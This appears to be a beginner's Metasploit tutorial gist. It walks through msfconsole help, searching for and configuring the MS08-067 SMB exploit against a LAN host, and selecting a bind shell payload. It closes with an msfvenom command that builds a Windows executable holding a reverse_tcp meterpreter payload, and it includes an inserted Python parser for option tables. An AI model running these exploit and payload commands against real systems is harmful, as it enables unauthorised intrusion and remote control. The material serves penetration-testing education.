Created June 14, 2017 21:13
Learn the basics of Metasploit Framework in 5 minutes !!
#before opening - update the framework
msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
..... snip .......
#Open msfconsole using the terminal
msfconsole
[*] Starting the Metasploit Framework console...
[Metasploit ASCII-art banner]
http://metasploit.pro
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0:-)
+ -- --=[ 1387 exploits - 777 auxiliary - 222 post ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
msf > help
Core Commands
=============
    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    go_pro        Launch Metasploit web GUI
    grep          Grep the output of another command
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    makerc        Save commands entered since start to a file
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    quit          Exit the console
    reload_all    Reloads all modules from all defined module paths
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Sets a variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers

Database Backend Commands
=========================
    Command             Description
    -------             -----------
    creds               List all credentials in the database
    db_connect          Connect to an existing database
    db_disconnect       Disconnect from the current database instance
    db_export           Export a file containing the contents of the database
    db_import           Import a scan result file (filetype will be auto-detected)
    db_nmap             Executes nmap and records the output automatically
    db_rebuild_cache    Rebuilds the database-stored module cache
    db_status           Show the current database status
    hosts               List all hosts in the database
    loot                List all loot in the database
    notes               List all notes in the database
    services            List all services in the database
    vulns               List all vulnerabilities in the database
    workspace           Switch between database workspaces
msf >
msf > help services
Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <file>] [addr1 addr2 ...]
  -a,--add           Add the services instead of searching
  -d,--delete        Delete the services instead of searching
  -c <col1,col2>     Only show the given columns
  -h,--help          Show this help information
  -s <name1,name2>   Search for a list of service names
  -p <port1,port2>   Search for a list of ports
  -r <proto>         Only show [tcp|udp] services
  -u,--up            Only show services which are up
  -o <file>          Send output to a file in csv format
  -R,--rhosts        Set RHOSTS from the results of the search
  -S,--search        Search string to filter by
Available columns: created_at, info, name, port, proto, state, updated_at
msf >
msf > version
Framework: 4.11.0-2014122301
Console  : 4.11.0-2014122301.15168
msf >
msf > resource
Usage: resource path1 [path2 ...]
Run the commands stored in the supplied files. Resource files may also contain
ruby code between <ruby></ruby> tags.
See also: makerc
msf >
msf > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf > sessions
Active sessions
===============
No active sessions.
msf >
msf > search ms08-067
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf >
msf > info exploit/windows/smb/ms08_067_netapi
       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28
Provided by:
  hdm
  Brett Moore
  frank2
  jduck
Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:
  Space: 400
  Avoid: 8 characters
Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.
References:
  http://cvedetails.com/cve/2008-4250/
  http://www.osvdb.org/49243
  http://technet.microsoft.com/en-us/security/bulletin/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf >
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.76
RHOST => 192.168.1.76
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.76     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) >
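An added example, not part of this gist: a Python parser for the fixed-width `show options` table above that reports which Required options are still empty, the check worth running before `exploit` (RHOST is blank until `set RHOST` is issued). The table text embedded below is constructed here to match msfconsole's column layout, not captured from a live console.

```python
import re

HEADER = ["Name", "Current", "Setting", "Required", "Description"]

# Constructed sample of `show options` output in msfconsole's layout:
# fixed-width columns, a dashed underline, one table per option group.
# RHOST in the module table is still blank, as before `set RHOST` above.
SAMPLE = """\
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address
"""

def parse_options(text):
    """One dict per option row, across every option table in `text`.
    Column edges come from the dashed underline, so an empty Current
    Setting cell is still read as its own (empty) column."""
    lines = text.splitlines()
    rows, i = [], 0
    while i + 1 < len(lines):
        header, underline = lines[i], lines[i + 1]
        if header.split() == HEADER and re.fullmatch(r"\s*-+(\s+-+)*\s*", underline):
            starts = [m.start() for m in re.finditer(r"-+", underline)]
            i += 2
            while i < len(lines) and lines[i].strip():  # a table ends at a blank line
                row = lines[i]
                cells = [row[s:e].strip() for s, e in zip(starts, starts[1:] + [None])]
                rows.append(dict(zip(("name", "setting", "required", "description"), cells)))
                i += 1
        else:
            i += 1
    return rows

def unset_required(text):
    """Names of options marked Required=yes whose Current Setting is empty."""
    return [r["name"] for r in parse_options(text)
            if r["required"].lower() == "yes" and not r["setting"]]
```

`unset_required(SAMPLE)` returns `['RHOST']`; the payload table's RHOST is ignored because its Required column reads `no`.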
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
   Name                       Disclosure Date  Rank    Description
   ----                       ---------------  ----    -----------
   generic/custom                              normal  Custom Payload
   generic/debug_trap                          normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                      normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                   normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                          normal  Generic x86 Tight Loop
   ... snip .....
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.76     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.76     no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set LPORT 1234
LPORT => 1234
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
BOOM BOOM
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
#Help
msfvenom -h
#To list all payloads
msfvenom -l payloads
#To list all encoders
msfvenom -l encoders
#To list the available output formats
msfvenom --help-formats
#Syntax: the payload name, its options as KEY=value pairs, then the output format and output file
msfvenom -p <payload> [KEY=value ...] -f <format> -o <outfile>
#Example: build a Windows .exe carrying a reverse_tcp payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=12345 -f exe > win_exploit.exe